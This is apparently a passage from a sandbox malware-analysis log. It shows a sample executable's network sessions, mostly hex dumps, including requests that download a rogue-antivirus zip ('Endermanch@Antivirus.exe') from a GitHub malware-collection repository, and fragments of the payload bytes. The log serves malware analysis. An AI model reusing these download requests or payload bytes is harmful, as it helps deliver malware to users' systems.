                                                                                                                                                2022-09-29 12:51:30 UTC7529INData Raw: 48 7b c5 33 46 47 c7 65 2e ad 1f 80 29 0b 1c 57 28 70 e4 de 76 91 ac 9f a5 da e2 e2 da 27 cd 8d f4 17 37 b7 1f 30 f1 1b d3 18 c2 56 41 f4 57 c9 04 f9 dd 69 b7 bb 9b fc 2f 82 b8 db 5d fa fb 40 ae 8d db da ca d1 24 6b 50 d3 be 8e 8a 79 47 e0 52 d5 5f fe 2c 78 d4 0b ae f8 0f ba 6c 68 c2 26 ff b6 6a 53 87 9b e8 31 51 5b 0b 42 95 0a d4 6f e2 6f b4 3c 6a 75 3c d7 ba d2 24 4c 33 06 9c b3 23 fa a5 bc a5 e3 15 f1 03 16 ab ab 61 4d 8b 6d 41 67 a5 37 d1 c1 e9 da c4 f8 fd e6 9b 68 64 2c 8f e6 3a da ac 5d ab 0f 0d 56 2b ed 2f 39 b2 52 81 54 64 cf b2 60 ef 74 fc 2f 96 1b 51 cd fd f8 9a 12 89 15 74 74 b7 72 24 65 a5 2c f9 f2 80 c0 8c b9 69 55 d4 81 45 e1 01 dd b8 82 d7 b3 83 9f 92 bd ff fc 82 ce ce 16 f1 7b 9b bb 5c 43 84 2e 55 dd 9c 49 f3 76 88 0a 02 26 56 dc 67 b5 b1
                                                                                                                                                Data Ascii: H{3FGe.)W(pv'70VAWi/]@$kPyGR_,xlh&jS1Q[Boo<ju<$L3#aMmAg7hd,:]V+/9RTd`t/Qttr$e,iUE{\C.UIv&Vg
                                                                                                                                                2022-09-29 12:51:30 UTC7531INData Raw: 5e 6b 33 bc 58 36 85 0b 3e 87 ad 4a d9 c8 0b 73 36 e7 bc eb b5 d4 50 23 a0 81 00 7c 5f 2a b1 d2 2c 54 be b3 99 69 aa c9 f0 26 1d 72 da 8a d6 c7 c2 4b 54 95 51 9b 21 a3 a7 ee f9 d6 b7 bb 67 f8 2b 44 a9 52 3a 83 20 60 fb a7 39 3e 6b 54 d4 d4 d9 35 3c c2 fa 95 fd 62 d4 58 47 f3 d8 54 66 d9 75 b1 ff 43 18 34 96 db 6d a7 76 32 51 06 d9 3c cd 32 24 2d c3 e8 0c 7e 9f 91 f1 01 c7 36 f2 61 82 5a 94 b3 79 0e cc ac c0 32 2a 2c 4d 44 c6 53 e8 db 18 be 7b 32 b3 4f 75 c2 a4 b2 d7 57 34 14 7e fd 02 4f 03 26 d3 1e 28 4e e5 5f e3 f3 02 d8 1e 02 42 ca 21 ff 93 df 50 8f b2 43 12 01 e5 25 44 7f 10 7d 3f 52 bb 31 cd 1f 5c 4c 47 69 a2 92 b4 07 c6 f5 6f 2d 01 e9 c5 e7 d5 32 3f 10 1a eb fa 80 72 47 08 10 ff fa 03 01 f0 ad d3 f7 53 c9 20 b9 0b 69 b4 72 4a 63 4d 25 88 98 22 9d cd
                                                                                                                                                Data Ascii: ^k3X6>Js6P#|_*,Ti&rKTQ!g+DR: `9>kT5<bXGTfuC4mv2Q<2$-~6aZy2*,MDS{2OuW4~O&(N_B!PC%D}?R1\LGio-2?rGS irJcM%"
                                                                                                                                                2022-09-29 12:51:30 UTC7532INData Raw: 73 8c 93 5f 16 a3 c4 b5 cb c6 a2 3c a5 c5 f5 42 12 2d a1 65 0f 26 35 53 a6 9d 32 46 c5 d9 fc b9 99 cc 73 e0 7f db ab 66 15 79 ec e3 8f 9c 98 c6 f3 84 f9 aa 76 92 78 be 77 2a ef f8 e8 2b e7 46 57 40 61 b0 1e 02 72 e1 e1 c2 d5 f4 09 af f9 0b 4d 78 a3 95 2f 2d e2 3a 8c ef 8b 91 f1 57 b1 3e d1 3f 2d 37 1a 5e 71 e8 0e 61 e7 98 2c 37 46 e9 b1 4e 40 4b eb 47 48 8f f8 3b 4f 36 b2 28 e1 57 ed ad e6 1c df b0 99 50 0c be b9 7a b7 ab 3a 0d d9 db c2 f1 d3 22 59 34 e1 7d 67 58 b4 fa 40 44 e8 cb e1 c9 ac 5e 3b 0a 51 74 1a 94 25 1a 93 fe 67 07 50 8a 1d a6 67 69 d7 3e 48 5d cc 9b 4e 35 a0 d4 58 31 55 32 e3 90 5a b2 e4 db 73 f4 9c 74 10 0a 60 37 9d 05 6c 67 a0 ab 08 b9 2b f5 dd 0e 2b e9 0e 75 72 30 40 d6 1f f4 20 dc 04 08 9a af 6c 52 72 af 11 b6 f1 c2 96 98 55 dd af f3 73
                                                                                                                                                Data Ascii: s_<B-e&5S2Fsfyvxw*+FW@arMx/-:W>?-7^qa,7FN@KGH;O6(WPz:"Y4}gX@D^;Qt%gPgi>H]N5X1U2Zst`7lg++ur0@ lRrUs
                                                                                                                                                2022-09-29 12:51:30 UTC7533INData Raw: bb a4 5c b2 31 34 86 d5 8e de a2 d6 e9 a0 c7 2d ee bd 02 88 19 86 ff 9b 89 66 bf a4 7f 1f 84 0c 72 a3 9f f5 71 0f e4 45 b7 47 b9 02 76 ee ee 75 08 42 41 b7 27 93 80 1e e5 d8 05 13 e6 fe fe e0 11 6d 8f 02 e8 91 af ec 1a 02 50 5a 89 56 41 4b 2d cd df 65 cf ed e3 fb a8 f4 80 16 27 77 98 4c 7c 86 45 8d d7 79 d0 ae c4 7e 7c 1f 59 68 fd d2 45 f5 31 02 8d ec d5 2a 57 58 89 c9 8c ff 97 24 f0 6e b9 c2 dd f3 7a dc 63 41 20 fe 1f 4c ba 7e 9c c5 1f df 81 74 35 52 90 17 81 de 78 de 08 e9 fc e3 d0 ce f1 1a bd b1 48 75 29 34 e7 f4 ee 31 c2 a4 d2 62 e7 16 9b 31 f1 11 c4 da fa 22 91 9e 17 2e 91 f2 b1 1a 3f bb a9 3c 62 1b 7e b4 f9 8e 4c 19 53 f3 9e bb 14 3a 0f d2 35 0a ea c9 85 1b 57 d6 f1 a5 99 a9 ce 47 cd a4 d6 36 46 1b 25 11 9b 63 01 2f b6 88 80 ad 99 53 2c 43 99 8a 8d
                                                                                                                                                Data Ascii: \14-frqEGvuBA'mPZVAK-e'wL|Ey~|YhE1*WX$nzcA L~t5RxHu)41b1".?<b~LS:5WG6F%c/S,C
                                                                                                                                                2022-09-29 12:51:30 UTC7535INData Raw: ab a8 cd c9 26 95 e6 d8 40 c6 4d a1 99 c4 61 99 9f eb 49 2a 90 f3 4a 34 4b 64 3b c7 43 05 5d 71 5e 08 a0 b5 3f 80 79 0b 7b f4 1b 92 29 8a 70 ec 12 b3 7a d1 27 40 c3 45 25 60 35 d0 c5 70 e7 ea f8 c2 ff c2 a3 0f e5 45 61 79 11 c8 bb f6 b3 30 5b 11 58 43 9d 0c aa 0f 97 3f 02 92 93 dc fb 86 5f e0 ec aa ad 6f 37 19 ab e9 d3 1f 96 73 c2 8e 40 97 28 61 21 9c 4e 63 90 19 d3 d6 59 1b 45 f1 45 a0 f8 0a ef 30 4b 36 27 19 a4 80 00 a8 a0 cc 4f c3 14 ab ec 43 df 76 91 62 cf db 8e 62 e4 e6 d5 fe 8c b0 15 6a 04 ae 9e a3 5e c3 89 e8 00 75 a2 a5 cc 21 96 88 b3 5e e9 06 dc 67 dd 6e 2c 8f f4 09 ff 05 18 7c b3 52 d9 d6 60 fa 98 df 35 d2 c7 94 2e 2f 00 b8 fa b7 ce 1c 01 80 8d 85 40 33 55 60 d1 5a 3e 2f 82 51 7f b3 a1 a4 82 84 2f 80 7f bb c6 8b f2 97 32 0d 93 29 56 97 a4 07 cd
                                                                                                                                                Data Ascii: &@MaI*J4Kd;C]q^?y{)pz'@E%`5pEay0[XC?_o7s@(a!NcYEE0K6'OCvbbj^u!^gn,|R`5./@3U`Z>/Q/2)V
                                                                                                                                                2022-09-29 12:51:30 UTC7536INData Raw: 65 09 5d 4a dc a6 c2 e3 23 af eb 96 8e ee 14 d4 9e 46 36 3b e9 de 53 03 eb 8b 08 0e 06 ec 96 da d1 87 58 36 f0 04 fb 49 92 64 bf 41 b5 55 d1 c0 c4 57 90 ac af e9 dc 6d ec aa a6 b4 8f e0 8d e0 c0 4a 84 20 5d 80 6b f1 23 62 83 eb a3 bd ff b4 1a 8d 2e 1f e9 b3 5a 89 49 eb 56 09 bd e7 a2 8e c3 33 59 e1 53 13 0d 3a 9e 0d 0f f3 de 52 9b 39 78 62 d8 82 78 08 b7 20 52 df cb 43 ec bd f7 ae 5c c5 11 fe 9a 6f be ed 1a 38 56 92 5a bc a7 a9 6e d7 0b 95 f5 4e af 5b c0 1c 23 da f6 ac 4b a0 cd b1 db c1 ee e0 b2 c3 b4 62 21 1d 5d f8 ef 34 06 39 df 50 03 a0 b7 1e 18 d5 17 84 0b f2 61 1f 65 36 d6 d6 00 22 65 3b 6a e9 c8 9e 51 d9 92 fc 5f 9f 76 50 3b 6f e7 eb bb 60 d5 38 66 10 a4 74 62 fc ac aa c2 73 84 21 6c de 21 40 0f e0 36 5b a6 84 0b 9c 8e 56 02 da fe 06 15 e9 a2 0c 0c
                                                                                                                                                Data Ascii: e]J#F6;SX6IdAUWmJ ]k#b.ZIV3YS:R9xbx RC\o8VZnN[#Kb!]49Pae6"e;jQ_vP;o`8ftbs!l!@6[V
                                                                                                                                                2022-09-29 12:51:30 UTC7538INData Raw: a5 98 f0 c0 34 d1 7d 12 29 c5 d1 1e a5 14 f9 e3 1b 99 5c 21 e4 24 fb 42 cb 67 e8 57 65 70 3a f2 f8 b3 ce 36 42 06 a8 4b 11 73 0e 43 79 0e 8a 3e 4e 4e 1d 89 4d 94 7a f9 5d 7e da 23 af a8 90 1e 19 91 8e 67 7a 11 3a 7f ef 59 50 3b 33 8b 08 b1 8c 71 14 a4 58 f8 8c 09 27 d7 0a 95 f2 7a c6 d8 b8 76 8c 8a 5b 4c 0b 01 3c 58 20 e4 87 79 4e 84 d0 4e 52 d2 f9 4b 98 56 46 de 64 3d 50 49 0a ef 30 e0 83 c3 33 2e 1b 1e 95 d2 6b 5d de eb dd d1 4f 73 49 3e 35 df 36 b3 79 10 29 c8 9f 61 d0 a0 7f 7d 43 63 eb 12 e8 a7 d1 58 11 54 ad c5 66 72 d9 e4 a7 d2 e3 0f 2a e2 c1 42 be 6a 62 80 98 ab 90 ba e3 46 07 44 bc d9 d8 7d 60 c9 68 73 cc 60 cb cf c7 d7 da cc aa a0 25 e3 ff e4 a1 09 7b df 7d 42 27 7a 6a 88 2c 50 48 be ee 62 1b cc c4 18 9c e5 d6 95 a9 bf 55 db 97 fe 43 3c d0 0c b7
                                                                                                                                                Data Ascii: 4})\!$BgWep:6BKsCy>NNMz]~#gz:YP;3qX'zv[L<X yNNRKVFd=PI03.k]OsI>56y)a}CcXTfr*BjbFD}`hs`%{}B'zj,PHbUC<
                                                                                                                                                2022-09-29 12:51:30 UTC7538INData Raw: 56 ee aa 6f b2 e3 b6 42 e1 69 78 e4 b5 01 46 af 64 4d bc 5e 2d 66 05 56 ac b6 87 16 18 7b d3 e0 b8 d7 68 c2 ff d3 8f 3d 9a f9 19 47 89 65 72 de f9 5b 1c 8e 6c c3 3f d9 5e 3c d6 1a fa 2b 54 99 df 34 15 75 3d d5 36 ed 55 fd 0a 3a 38 4c 20 74 61 88 c5 ab 02 85 fa 4f bd dd 60 0a 2a c9 09 88 6f 42 87 ce e9 5f 69 67 49 67 7f 2b 6a 4c df b8 38 3c 53 7d b3 9b 6b 27 68 3f 6a 49 19 19 44 59 21 d4 e5 a8 9d b8 4b f7 05 df 96 e9 a8 96 fb 49 23 03 ed 98 4d 2a a4 4a 67 cc 47 8c 0e 32 7b dc 4a 1e 11 bb b6 0a af 3b cd 84 74 1e cc 74 84 86 8f 02 2d e9 c4 c9 2e e7 5a bf 3b 19 24 07 0b b3 d0 4c e4 e7 00 52 3e 2d dd 94 8d c3 59 71 88 2f e2 2c 7e 91 62 92 d5 0d 80 0a fe 94 d8 56 0f 41 2b 2a ac 14 28 33 7f fd aa 8a b0 af 14 2a 00 7e d6 22 0f aa 15 5f 92 9c 38 c6 70 49 f5 84 6d
                                                                                                                                                Data Ascii: VoBixFdM^-fV{h=Ger[l?^<+T4u=6U:8L taO`*oB_igIg+jL8<S}k'h?jIDY!KI#M*JgG2{J;tt-.Z;$LR>-Yq/,~bVA+*(3*~"_8pIm
                                                                                                                                                2022-09-29 12:51:30 UTC7554INData Raw: 2e ad eb 73 3f 16 24 79 e2 05 7c 52 35 b9 b5 77 b9 58 0b e7 fd d2 e0 76 3c 17 c9 12 c5 2e e4 9e 36 e4 e8 56 6e 88 41 56 eb 47 3b a9 c0 e9 3a b7 fa 1c 44 75 50 84 d3 5b a0 5e cd 97 9d 2f bd 25 62 bb 7b 00 6e 42 7e 00 d7 f0 5c 2f b2 d8 4c f6 e8 d9 39 1c 80 41 5a 8e 1d e6 d5 fb ef 30 12 ee a6 b8 3b 59 e1 10 52 e8 06 2c 7c bd 68 50 c8 d9 06 a5 f6 bd d7 18 22 82 a9 72 14 a6 b8 61 12 f4 2d d4 24 d2 c3 a9 99 ec b2 55 72 e4 60 9b 4a 01 49 8a 02 ff 62 64 5d d4 b9 7b c0 1c eb a3 e4 4a 7d a8 73 4d 2a b6 de de 7f 38 fa 6d 61 80 fc a8 5f 2b d8 8a 08 e2 0f 87 51 ea c2 1b 50 39 8d ee 95 aa fc 58 8d 78 be 25 33 c3 d9 02 22 68 00 b2 ca 07 de a1 fe d5 95 2b 3d 06 fa b3 e1 28 4b 9f 66 21 0f 5c 92 64 46 83 b8 e7 ac a8 74 0e 31 2d 53 d2 d7 1c b5 41 b4 39 3f c7 19 cc a1 54 47
                                                                                                                                                Data Ascii: .s?$y|R5wXv<.6VnAVG;:DuP[^/%b{nB~\/L9AZ0;YR,|hP"ra-$Ur`JIbd]{J}sM*8ma_+QP9Xx%3"h+=(Kf!\dFt1-SA9?TG
                                                                                                                                                2022-09-29 12:51:30 UTC7570INData Raw: 6a bb 29 71 a8 35 51 69 eb 58 bc 29 82 5c db d2 1f b2 af 06 e3 c6 79 ee 31 78 75 c6 32 3f 8c f6 44 35 9d 70 46 ac 48 17 60 30 94 88 1d ed f8 1a 08 d4 4b 94 b3 79 07 e6 86 7f 57 84 91 ef b9 14 d7 55 5d a1 f9 94 2f f2 5b f3 7e aa 72 9a d8 14 63 f7 8e 92 bb 85 df 71 2e 44 43 dc 3b d1 88 f5 07 31 67 e1 24 cb f5 24 1c 79 8e 51 95 a5 1f 3e 04 c2 82 ff fe 52 4c 3f 57 d2 d6 ea a6 bc db 97 23 a9 f1 e2 1c bf 81 44 c5 a5 19 3a 4a 4b 37 69 cf 07 ef e9 fd 2d dd e3 4b c7 e2 f3 83 2a 32 d7 c0 81 c1 aa 46 91 ed 3e a2 5e 72 2f ea 75 be 40 0f de 34 53 62 29 9e 3c 60 b0 02 28 b6 39 83 e8 e1 5d bc 34 52 83 a9 a0 6c 99 66 87 a0 f6 12 d1 bb 31 0a 0c 8b 62 c3 de c6 f9 a1 cf b9 64 93 af e9 5d 42 89 29 9a 31 26 2d 80 c9 61 b5 5b cd 27 55 6f e4 c4 05 74 60 bd 71 15 a7 a3 8a 47 09
                                                                                                                                                Data Ascii: j)q5QiX)\y1xu2?D5pFH`0KyWU]/[~rcq.DC;1g$$yQ>RL?W#D:JK7i-K*2F>^r/u@4Sb)<`(9]4Rlf1bd]B)1&-a['Uot`qG
                                                                                                                                                2022-09-29 12:51:30 UTC7586INData Raw: b8 06 87 f0 81 73 f1 5f 8d b2 c4 ef 7c ea 86 ca 02 23 17 e9 e0 44 cf 08 37 96 b8 e4 09 2a 25 32 99 30 8a 90 a2 10 6c 22 ae 5c 4e 9b 53 9f b2 77 79 64 9e 64 bf 87 c9 a5 97 66 7d 8a bc 77 77 fa 0b 6f 6f d8 67 b2 03 f9 a6 58 27 8b 7e 5e 5a a7 91 5a ad 08 c2 67 c8 d0 69 e8 09 99 41 d6 27 00 7c 7e 2b 36 a0 72 b5 10 ed a0 a1 0b 56 43 a4 fc 69 ec 91 69 86 6a ad 33 8e a0 83 01 df 2d b8 33 70 6b f6 44 50 61 b8 2d 68 2e 03 0d f5 12 60 4f d5 fc 10 2a 86 09 0e 5a a6 92 25 7a 37 47 ca ce c5 1a c2 67 63 3c 85 ad a0 fe 78 84 c4 3d 1b d2 3b dd b4 97 a3 3a b9 92 1e 23 4b c8 6c d0 b1 0f 36 59 cb e7 a0 f8 b9 d8 9a 89 5f c4 27 e0 3d fa cd 1e 42 e0 c4 5e d7 0d f1 39 63 ad 05 cc 4a b0 29 e5 b5 c4 f1 55 93 70 26 d5 d9 32 2c 11 fa f1 51 d3 e9 eb a9 6c 16 a7 7c b3 b1 99 90 b7 35
                                                                                                                                                Data Ascii: s_|#D7*%20l"\NSwyddf}wwoogX'~^ZZgiA'|~+6rVCiij3-3pkDPa-h.`O*Z%z7Ggc<x=;:#Kl6Y_'=B^9cJ)Up&2,Ql|5


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                28192.168.2.549728140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:30 UTC7598OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:30 UTC7598INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:22 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:30 UTC7599INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                29192.168.2.549729185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:30 UTC7600OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:30 UTC7601INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1410736
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "245193138e3f9b39cf44c134a58bf8b376783e8722bddc3a8150360e1df811da"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 082B:AB9E:ECAD7E:FC2F3E:6335934D
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:30 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6945-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455891.668300,VS0,VE187
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: bf8f94cfed33e0bc60472af69f295c30e1dcc575
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:30 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:30 UTC7601INData Raw: 50 4b 03 04 14 00 01 00 08 00 07 13 99 43 46 06 5c d7 fa 85 15 00 00 8a 1f 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 2e 65 78 65 c6 7a f1 ff 6f 5f 2b 10 01 9f 9f e1 23 1b 17 e7 90 6d 67 f3 c3 f9 24 f2 59 57 1e ae 47 e5 70 43 6f 74 d3 73 c5 89 ff cc 24 c7 9e c3 ac d7 0a a2 52 de 99 d6 8b 1a 61 86 8b 3a 8a 7f ba a0 aa 63 ff 6c 89 3f a6 2c 72 ef 29 69 ae 9c 49 04 bf f3 7a 15 30 09 32 46 b3 35 83 df 62 92 46 b9 b1 59 06 cd 5d 8b 43 b1 1a 81 70 6f ca af 98 7f 22 13 fe 1d 95 a8 28 7f d5 3e 47 f6 a5 4d 36 8f 22 37 d9 7e 91 94 7d da 95 a4 c0 f6 56 43 62 16 e8 5f 2e 55 e0 4c eb f1 7f 05 c8 09 ee c1 82 9e a9 36 6f a6 d9 d4 c8 95 fa 88 a7 ce 2e 0d d1 9f 23 41 c5 a4 5b 09 88 31 b6 e0 f6 2e ae a8 b9 3d 9e fd 7d 10 72 10 c9 3d 42 20 0c
                                                                                                                                                Data Ascii: PKCF\Endermanch@Antivirus.exezo_+#mg$YWGpCots$Ra:cl?,r)iIz02F5bFY]Cpo"(>GM6"7~}VCb_.UL6o.#A[1.=}r=B
                                                                                                                                                2022-09-29 12:51:30 UTC7617INData Raw: 17 25 69 d2 37 6d 1f a3 b6 00 d2 cf 54 18 a3 7c c6 b6 d5 4b 2e 58 83 7a 70 cd 3f bb 1b 49 bd 8b c8 d3 41 57 ee 49 fc 86 ca 3b 4d e8 26 8a c9 52 c5 40 00 26 bf c2 fd 35 f0 8e 1a b7 10 af b0 ab a6 32 fb 27 18 d3 e8 69 b8 d0 d1 ac 97 01 16 a7 29 8b 91 84 6f ec f0 33 9f 76 e1 1c ac 4e 6f 4a f1 e2 20 94 77 f1 1d 4b 65 66 45 d2 82 0f a2 49 58 e8 66 d6 a5 34 fe 8b e8 a2 17 94 ec 9b 19 3f fc 1e a2 be 29 f4 2c ab 04 7c db cd b3 c4 a5 fd e3 2e 36 71 dc 42 da 62 6b 70 2f 6a 13 7e 2c 42 85 b3 b9 8a 34 7f fe c0 a6 97 3f 33 33 bd b2 da 74 da 62 39 ad 60 07 60 95 14 22 4e 94 b2 68 19 7d 36 b0 3e ab 4b 58 0f 0c 4a 30 02 c5 e4 b0 a6 00 10 4f d8 c1 f3 82 bb 50 db 21 a0 d8 5f 7d 81 0e ca 66 56 38 15 fa 32 f1 f0 f7 96 c9 05 47 45 75 ed 6b b6 b2 96 18 2c 5b e0 cf 73 2a 77 94
                                                                                                                                                Data Ascii: %i7mT|K.Xzp?IAWI;M&R@&52'i)o3vNoJ wKefEIXf4?),|.6qBbkp/j~,B4?33tb9``"Nh}6>KXJ0OP!_}fV82GEuk,[s*w
                                                                                                                                                2022-09-29 12:51:30 UTC7633INData Raw: a6 d1 77 a2 cc 36 24 b5 fe 40 2d 92 69 0b 09 65 b2 57 d7 1a fd b2 f9 29 43 8b cb 2b 78 22 ef 6a ac 7b d6 df f0 d5 24 f4 df 00 6a c3 b6 10 e2 6b 07 87 19 39 f8 08 27 e9 e1 1c 3a 1a 09 64 d0 38 87 af 25 85 37 27 42 d6 b7 b9 87 69 7e 52 86 49 7b 23 63 1a 04 52 bc 99 51 70 b0 34 e4 ab 36 f8 99 92 9a ea b8 b7 44 0d 5b 61 63 fb e8 a8 8b 63 c6 87 aa 16 a3 4f 3f 74 0c 61 5b d5 58 0d 6a 66 4d 45 7f dd 48 ce c3 b2 ea 0a 6c cc b1 a7 98 88 b1 81 85 4f 3d 5c 19 9c 35 a1 39 28 8e 5e 76 7b ae db 0b ee ae ec d2 8c a3 92 c9 f4 17 89 78 9b cc fe 08 ae d4 31 a5 00 45 26 18 3b 7a 09 ea 06 5f f3 c7 05 95 d2 4f 44 63 47 33 d8 9d ad a0 b7 97 53 82 a2 0d 2d 0e 54 70 80 a8 58 cc c5 bf 07 4c 81 20 f0 0d 90 48 e6 dc 79 c2 d1 d3 a0 51 14 a9 92 9b 88 98 3d 51 51 64 bc f9 2e 1b b2 61
                                                                                                                                                Data Ascii: w6$@-ieW)C+x"j{$jk9':d8%7'Bi~RI{#cRQp46D[accO?ta[XjfMEHlO=\59(^v{x1E&;z_ODcG3S-TpXL HyQ=QQd.a
                                                                                                                                                2022-09-29 12:51:30 UTC7649INData Raw: b2 cf 49 c3 6e f0 2f 48 af df 8c 32 59 87 d5 2a db 5d 55 e4 58 8b 37 e4 9d 56 72 a3 13 9b 7c fb 24 62 2f d6 eb 93 f4 b3 fe 57 30 b8 ab 22 24 e4 1b f8 7c 2b 5b 27 a3 e7 86 50 f0 4c fd 84 cf 2f 6f cc ad 99 48 f8 45 a1 e8 f8 ed 68 4d 98 65 c6 5e 67 8b 7f a2 86 da ef b2 43 33 f8 90 56 92 9c a1 62 d4 7a ab 3c 96 45 b3 9c dc 6d fc ca 5c c5 d0 d4 8c 2d 73 5d f2 e7 b5 77 a3 f5 b0 a0 a8 85 66 2c dd bd 95 ea 09 66 4e e8 7b 21 c9 c0 77 0b da d9 22 66 08 8a f2 88 d6 03 19 92 01 c5 a0 37 b1 8f 97 34 55 a9 78 58 61 7d 09 58 8d 9f c6 dd 11 a1 d5 e8 b4 e8 2a f3 4f c7 1e c7 dd 33 25 ce 72 14 72 20 bc be 4a 50 19 16 18 ef 39 40 f0 9a bb 9a 93 73 e0 15 df 2b 04 f0 77 2b a1 b7 f0 e0 a6 ff 63 63 7e 62 92 81 ac 50 73 46 df 38 3d bd 76 1f 76 8e d5 5e 1e 18 57 df 90 93 62 7b f6
                                                                                                                                                Data Ascii: In/H2Y*]UX7Vr|$b/W0"$|+['PL/oHEhMe^gC3Vbz<Em\-s]wf,fN{!w"f74UxXa}X*O3%rr JP9@s+w+cc~bPsF8=vv^Wb{
                                                                                                                                                2022-09-29 12:51:30 UTC7665INData Raw: e9 3f fc a6 db 85 26 dc 10 b8 31 b1 54 72 25 9f 6c b9 e3 54 76 67 9b 54 94 3d ef a1 49 90 cf be fa 2a 9b 7e 71 dc 61 50 05 c6 65 e7 4a 52 73 fd 5a d6 bf b9 02 f4 a4 05 af 47 21 5a 15 cb 26 57 16 93 21 4f ec 65 41 2f 75 57 16 9b d9 a3 6c 32 44 d1 44 cb c1 2a 36 25 30 37 cb ca 91 11 af e3 53 b8 73 42 8c 09 c1 18 78 38 c6 50 90 5e 3b 48 d9 17 f7 ae 3d c6 a8 a1 fd cb 4f 5b 33 a8 67 5e 48 ce f4 70 d6 b0 26 d7 0a 8a 53 ce db 43 83 98 69 4f 93 b9 d4 28 0f 5c b3 fe 11 f8 a4 da d0 f1 eb 70 4f 8b 3f a7 ce 41 ec a2 bf f3 3a 2b 68 74 be 55 ad e6 3e 0d 35 ea e2 64 b1 28 4c 1e 10 e2 52 b2 d9 2f 3b 13 3d 4c 67 0d 8e 70 86 03 b3 67 24 79 8c 92 e3 06 2e ad cd 18 c0 de 47 80 d8 0d 96 c0 b8 28 59 e2 3a 4a ab fd 8d 7b 56 92 0e 88 c3 0e ac 8f 0b 84 d5 be d0 3f 51 f1 04 05 cf
                                                                                                                                                Data Ascii: ?&1Tr%lTvgT=I*~qaPeJRsZG!Z&W!OeA/uWl2DD*6%07SsBx8P^;H=O[3g^Hp&SCiO(\pO?A:+htU>5d(LR/;=Lgpg$y.G(Y:J{V?Q
